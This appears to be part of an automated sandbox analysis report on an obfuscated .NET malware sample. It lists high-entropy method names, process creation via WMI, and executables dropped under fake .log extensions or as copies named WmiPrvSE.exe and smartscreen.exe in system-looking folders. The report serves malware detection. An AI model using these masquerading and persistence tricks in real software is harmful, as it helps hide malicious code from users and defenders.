Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, VxiCRQxNtOoEkFSO2FP.cs High entropy of concatenated method names: '_8X5', 'd65', 'jZcUYyeBPqI', 'HgoUYbX3aQr', 'G5yUICD1T3S', 'zp2UYRcxbBk', 'xQI5V4UTPDdBbCfsg1wC', 'irfrWqUT5658N1x75EOa', 'YyNjs5UT177P7OHIib4e', 'BsdA4ZUT9LfQGFoRj1KQ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wVGbI1Vdef2kCBdRYPL.cs High entropy of concatenated method names: 'RQvVl3WWep', 'ySHVKvX92H', 'rnWVJ5cYZp', 'm7mVOkSruj', 'c1RVQait7L', 'WLOVXg9SYY', 'perVz0DJEF', 'X7PCRlVpXW', 'tDgCUmW3Bn', 'HOlCBVMlmq'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, QFxANcutIyoqgSXg9je.cs High entropy of concatenated method names: 'hHKEdgUF33ao0UGaaDcP', 'N0hCNcUFj9YCuyWuyDle', 'xQYXOsUFTLTOug5YLpMX', 'ylpS2yUFL0Q1WlFNJmVk', 'XpWuICmSJ8', '_1R8', '_3eK', 'RDkux6sSvD', 'YqVuwmHwkW', 'IVnug6x5Vq'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, fN8GZyVrLBPXkDlOUPS.cs High entropy of concatenated method names: 'qlJV0KPcJ6', 'lJgVyXQ9GC', 'AkDVbZLqww', 'am7eJEU6WajBqJ0C6cGR', 'U07kbcU6w1FZJqE5AMcU', 'aVjonPU6giVMCG4CxCNL', 'b1QZLXU6An4oFEbDE6tI', 'qiGHDtU6ikKXwFSJVNg2', 'F2ksvAU6r7a4hN9mXH6u', 'NMwIS6U6mRg6ppl2VU6a'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pqoghDvZRGvjHhQRHRS.cs High entropy of concatenated method names: 'EoMvj7GsOB', 'q41vTAjKVL', 'qQ1nbUUu4G0oKDOB9hXG', 'zryZeTUuohPKSs5DrXY3', 'M3n8ISUuuAkY36O2cKA7', 'QNFv1O9HBv', 'pD5vPtiByM', 'Xrjv9gTbp2', 'CrmvMdAsl6', 'mnZvViMYbf'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BbO7wWS5cxbaGymyVbQ.cs High entropy of concatenated method names: 'jdUS4boB4I', 'wssKhsUpx92nGOr8XEwn', 'hRojH8UpwamoPjTipI1C', 'zMv7M8UpSjqckiDSHEBX', 'kOEV2aUpIXebeDKpg54q', 'LgDjFHUpgBMhjO47DowU', 'F8DSPUx2mF', 's4nq6AUp87Sltl8KpXnS', 'aK0VniUpU0KaxmqJVjEC', 'mHAQMnUpBkPiOX2yTYiw'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, sKiPk9lWXTPvVeyXn6A.cs High entropy of concatenated method names: 'Sorlis9WK3', 'pt6lrQ8MCE', 'GdalmIpogu', 'SjGl0QQwy7', 'HP5ly6Rt5O', 'aXflbwYqba', 'nsERYAUO68A6RfL0lNda', 'LCdaSTUOsbxjMeHgAHW0', 'rPruBwUONAAUs3lEY9tW', 'snrlOoUOF5Dh1VrcfuqJ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vt7VlxUKgERWgHKui7j.cs High entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'DoSUIqfwXWm', 'n6rU8F0761x', 'tMuNb7UVMHDa5rHfUd17', 'MSU3U8UVVp0DX759vJxA', 'CBm69qUVCfxGjmX4nxKS'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, HQveK2TZPpdYlbbymFh.cs High entropy of concatenated method names: '_0023wjg', 'Dispose', '_0023Trg', 'MoveNext', '_0023Zvw', 'get_Current', '_0023Wrg', 'Reset', '_0023Xrg', 'get_Current'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, snIgnG8supNNqgnWjmn.cs High entropy of concatenated method names: 'd3F8dbEBCp', 'KoXWoHU4ulswcmd21WLa', 'PRRfRxU4HnJxBmXKfHNJ', 'o8aIMGU4pv9kRTw3IDML', 'XRY8FxuCQ8', 'vl2lEsU4ViXHZ8tixyh8', 'E6Mtl8U4CAr2VCfjrOL3', 'vZPXqgU49t40nRij7vr5', 'mrxew9U4M6ymGJMgwAsW', 'cm6Ht9U44NMEt8bOb2Gv'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AguDZvV8XAU4A2bj0tF.cs High entropy of concatenated method names: 'N0GVvydwVT', 'QOBVtyxOnv', 'l3JVSGn6Wf', 'xxPVIvMTGh', 'GOcVx2grMp', 'iNVJVNUhQOup9pGYLbF9', 'JuOcLAUhJYq5Kjxf6N6R', 'pOu1ZbUhOvDQNruDcSbT', 'IYCD0cUhXA288K9mlyCd', 'B93QQrUhzADOgZJs325a'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, SDxgkMCGswquS2gCb1c.cs High entropy of concatenated method names: 'ASFCZWFaMF', 'pc7C5cLcJ5', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'rj4C1Yrr6D', '_96S', '_9s5'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, T3ia1E48vbq77NC5FPX.cs High entropy of concatenated method names: 'aP04vwdSjZ', 'IbB4to1eya', '_7Bm', 'QMM4Sa5q7C', 'PNu4IW7AWk', 'hQG4xXlJIZ', 'zNH4wibUlu', 'BY9cEeUs3nrQZKUsi1NO', 'E4n58jUsjmMe6WLFTpAZ', 'QQ59SkUsTkdpFgnDbsEp'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, bjtl9nU91QXO1mQ3ZQk.cs High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'JmVUIm6bCgZ', 'n6rU8F0761x', 'G2683yUMeDZ3AWYEVA96', 'wAXVxqUMlsM7sGLxS8Tq', 'BhcqD7UMK9mmMdHmeErg'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, UkYMyN0ZW1dmGHQjV7r.cs High entropy of concatenated method names: 'Toc0htSZfv', 'YO901GbThj', 'Mu10PrGWuH', 'sPe09ZYweM', 'hsP0MPav5v', 'etj0VAMX4n', 'Ty60CjxleJ', 'cQ9041s8mV', 'rST0oEI9jV', 'N1f0uKGAhi'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, i9aBvAta7NQBu7uYGHI.cs High entropy of concatenated method names: 'iHASRdExvc', 'LvTSUdAfqN', 'HhTSBVWs5p', 'kJc4xnUHNdkoSwUr1J7e', 'dn68ywUH6y4NIPKopeN1', 'KPLcN7UHslW7STTa8B33', 'CVvmTfUHFJguqsZa90s1', 'lfut69iUQ5', 'MqxtsSK5ma', 'uAjtNcvjOl'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BvKdSKz6i3GiqDst4c.cs High entropy of concatenated method names: 'FfnUUY5j6G', 'TToU8abIp7', 'RKjUYKyvSh', 'lahUvcYkkg', 'tGSUtJ8LJo', 'IPNUS29aXd', 'bvcUxCe6io', 'zpA38sUMMGgsvp2Lxpsb', 'CeNY2YUMVwJfKDltB821', 'EJ4WU1UMCHZTwEgl4Sic'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, PZVO9XQyvEW6EWkCOTf.cs High entropy of concatenated method names: 'bIKBvN28j2l', 'xo4BvFLo7O9', 'TZfq6pUQJauc3XhIRtPV', 'CGIVMxUQOsXbeiZ4BkJm', 'kdybQZUQQWwFoHKuuiwm', 'TCDAqjUQXlWm99iQWlNR'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, TkDPMiDomfmP4gpyrHD.cs High entropy of concatenated method names: 'N9xDpOgE4f', 'jTvDLXHqgQ', 'r3DDnjiTtd', 'mQ2DktrUTJ', 'UcADEOjXU5', 'dcLDaZPdtn', 'CEKDhTjfWU', 'WIUD6DSdXb', '_0023Nn', 'Dispose'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, mYFGYuDPPnsRtlgYXSW.cs High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'lhNDMj4EEP', 'FIH638UKComVDuN6cq99', 'iRpYpUUK4tO0ZJmNAjle', 'MMIn0SUKodQOemVVnveb', 'FQv5CZUKubr4oaAoIMVL', 'yHBvuwUKH91cZc5nhyH7', 'i87c95UKppdsiYwMErOE'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, tADCkJrqTU2Q0HlBmnu.cs High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'VsZrGwIFo4', '_947', 'hWMr7v7Bsw', 'hbYrZQuTjQ', '_1f8', '_71D'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, EPRO5exbMxYgPbrcZqi.cs High entropy of concatenated method names: '_816', 'd65', 'DEKUYSBdXe1', 'VT1UYIBdlw4', 'xojUI1gJC4N', 'zp2UYRcxbBk', 'W4TtXgUjFcrpehRVRTkw', 'f2eW0UUjDLUGCQcIN8yP', 'NTYadEUjsUh6Fw72rtxk', 'YcS3SjUjNPZrEmy3G5sk'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AvuW0DDJgLKXlqANM9u.cs High entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'qhNDQnDMRG', 'CEvDXUaWan', 'FjcDz8RTEW', '_0023Nn', 'Dispose', 'D4mXg3UKeZISJbAYpF1A', 'EJcGulUKllHl4hxXwcYH'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, JnrFR3NDGj5Umdksxhf.cs High entropy of concatenated method names: 'DFgNebXbnF', 'VRoNlgeGxv', 'PyoNKvokZj', 'ssCNJbdI0v', 'DxmNOG4ELF', 'tdlNQApnR8', 'n0MNXa4gI6', 'm13Nz7yM6T', 'P7OFRfjJCi', 'j20FU8i99W'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WucFfiouWiCvvghLiuF.cs High entropy of concatenated method names: 'K2KopQ8aif', 'i11ojTBSfe', 'DxGoTKwqPi', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'DD2o39SgaR'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BYTOxCSlRf8d8PbhFkH.cs High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'kYCwnWUpj3o2XpH0hFHS', 'jQNGwtUpTk7kTx7BNuX5', 'iUg5W6Up34bG03GHSIcH', 'VdEKFPUpLkNExZh0UWD5'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LkJErlBmfuQbEQI7Dva.cs High entropy of concatenated method names: 'uDbByuyiil', 'cBrBbuwvw1', 'hncRK2UVJeemPSTsHj66', 'nNUt10UVlq6kQZtPl6BY', 'mj2NLAUVKRnhWPwhWDvL', 'WRjjICUVOHBdHivZc286', 'tq9XJNUVQ0KU0ofDFasn', 'wxICpHUVXehDSZWWLZBv', 'CKr2DnUVzuevHCNGCsgj', 'blcSOAUCRER8chNlUjvs'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ka9Gk8eYX7oddSeBxPu.cs High entropy of concatenated method names: 'pRaetFQs7h', 'gL0eSmKwYa', 'mggeIdMYyp', 'vpoexQIE3M', 'NO2ewPAw5Q', 'JJaegdyyC1', 'akkeWN8p1n', 'QHZeAFdqiO', 'CjceiKYmxO', 'GEZerQCUci'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ynNMdxtSlP068ZfCbEy.cs High entropy of concatenated method names: 'kFSt2GLOgy', 'dMPtGS9IkZ', 'Pmj657UHSY8wRHjoK73j', 'euvWK1UHvgfmdXeevhQW', 'GegCGoUHtx5CfjyqaidI', 'XhTv4uUHI8hf5IChQ0rZ', 'MLetysg2oX', 'pPytbA8dOw', 'ISWXtEUH8PiQeoMQxwx1', 'cJkNfyUHUueU1gwFK0YZ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, f0273NpsOBkB35M3Fcd.cs High entropy of concatenated method names: '_25r', 'h65', 'ysYpFWHj0y', 'IcQpDfrpOk', 'f23pd9Sp7H', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wkXiTKeERMVdYVr8C01.cs High entropy of concatenated method names: 'C0sehqyPsj', 'l8Se6TgcRU', 'rVIesETM53', 'rXQeNBOeq8', 'LgxeFkbtKr', 'Ru7eDU38Vw', 'GlfedUwMUu', 'JbGeeucbP9', 'Tcr7ROUOZ5CJMIT0YcvF', 'ymULXoUOGxSv0UxV2TwJ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jKDEdMg4pSELQIYm4Ef.cs High entropy of concatenated method names: 'XwvAqFLkE7', 'JNBHBtULhvgCXjrsJR8R', 'Qg4mmkULEXY9YpJKb8HN', 'hDJDBpULavHG0nbt8t8E', 'Vdjgu5lhIM', 'neWgHibRSS', 'hGEgporqv4', 'edMgjuMrqJ', 'COagT7IvD0', 'KIdg3tILjP'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lX8j2AB4QZ617OouKwU.cs High entropy of concatenated method names: 'j0UBfE0C1R', 'QKtSa9UCbmjkSA7yX7T0', 'yW5YlSUC0pQqdpxwUul2', 'zBsSfOUCyYac24gJKwch', 'F9JQhtUCqpUtdJrRyWRL', 'RjhqXAUC23eC0DaOJjSM', 'cU5MMJUCGQ3MOuV0qUD6', 'LkDBujAoWH', 'hlFBHRTfpS', 'EcPBpGsGho'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pxw1SGV2fdojUI1JXeH.cs High entropy of concatenated method names: 'plDV7AoG9M', 'dBTVZN4Iwy', 'kTMV5agsuo', 'v29V1nFIcj', 'sX7VPuShV3', 'rMjV9XHooa', 'DIeYbJU62sB30Ft0vZLT', 'qaC7y7U6b1HmXjUpLlnF', 'fBAsrjU6q7fbnI0NsnRP', 'AeFU0LU6GWskBfNhIXKD'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, b5NKhLy17ibJYUQjat.cs High entropy of concatenated method names: 'JPxpfSB2e', 'TkTEnhU9KttmZTWeHocH', 'kOmx1gU9e1ifoCoUUXYP', 'YKbo67U9lYLY4iavrwQ5', 'yWbXjuU9JhsVYwWRxkQv', 'MOLqujRan', 'pIW2dAA5y', 'BvAG6cRQi', 'MHk73LE85', 'l6FZR3opI'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BoKyWKdAmvbd2b2RMwn.cs High entropy of concatenated method names: 'VSmUt3LohcH', 'nOuUtLpR3ss', 'e97UtcbLJbj', 'PhkVVKUJpBFdRgeBKiLR', 'yE2jBoUJu2b1s2ESHytF', 'iJtFGxUJHHefsc49ckjJ', 'ofKUI6ZGnvu', 'nOuUtLpR3ss', 'WjKkMoUJLgJ3KQybqftD', 'kiKKIIUJTPHeG92HABwl'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, IJJw9EvAOuvS43y66rB.cs High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'M3FUIGVFiiA', 'Er0U8zHOTet', 'vd2uPNUuINX1cSlsBnHk', 'Q21nhRUuxLutwTnRneJM', 'FmJycEUuwsbCYeipGYc0', 'YKZQjKUuguHqOwSiGHRd', 'EyVftiUuWMpViZoGWLfj'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LdTxK5idbydrif7a5IA.cs High entropy of concatenated method names: 'BuGil27VDy', 'ItIiKNiJds', 'qLJiJM2XIc', 'vyWiOkrEYB', 'WBYiQadbv3', 'X29hl8UccMncTWYQXncE', 'DuEge7Uc3r1bCfDV4W2i', 'AtvQsEUcLVgPITATCnoY', 'TNftiZUcfo976f7UL0me', 'ToEosSUcnJvUlB1JRC9S'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, L526CTiuqPoUqFeb8LJ.cs High entropy of concatenated method names: 'j9l', 'muJipB5bsr', 'rNMijgruKN', 'dnBiTkekVY', 'm42i3AZrm4', 'Ft3iLnCOpc', 'wP9icK7ADP', 'TLhEwlUc95oJqRIM4Id3', 'YiVkGaUc1HNdrd5uwZ4i', 'RBwYPtUcPKcg2jNYe6Cl'

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fTGLCVSM.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\stDzyxQe.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\yuQrGMvY.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\uDZAyPvf.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\gUHludjC.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\PwjnMVKl.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fcdLmHlJ.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\rreJQTki.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\ylgZbdUT.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\ttRrlCpd.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\EhviVOkL.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\aceLSxeO.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\KIRpkYvx.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\FNQYcsFE.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\WyUWCOVc.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\QyIevzpi.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\hILtgrfA.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\VoMNpBPa.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\DhiqiJKM.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\wjuqGuQY.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Recovery\WmiPrvSE.exe Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Downloads\smartscreen.exe Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\VWRNVcdg.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\bmmUfKkQ.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\RGFoMnqm.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\nGlBWAAq.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\IUzpLFaA.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\ArFrORkS.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\sBnSdgqk.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\qDaBeGpk.log Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\bmmUfKkQ.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\QyIevzpi.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\IUzpLFaA.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\ylgZbdUT.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fTGLCVSM.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\sBnSdgqk.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\yuQrGMvY.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\wjuqGuQY.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\nGlBWAAq.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fcdLmHlJ.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\WyUWCOVc.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\DhiqiJKM.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\uDZAyPvf.log Jump to dropped file
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\stDzyxQe.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\EhviVOkL.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\ttRrlCpd.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\aceLSxeO.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\ArFrORkS.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\qDaBeGpk.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\gUHludjC.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\VWRNVcdg.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\KIRpkYvx.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\rreJQTki.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\hILtgrfA.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\RGFoMnqm.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\PwjnMVKl.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\FNQYcsFE.log Jump to dropped file
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\VoMNpBPa.log Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
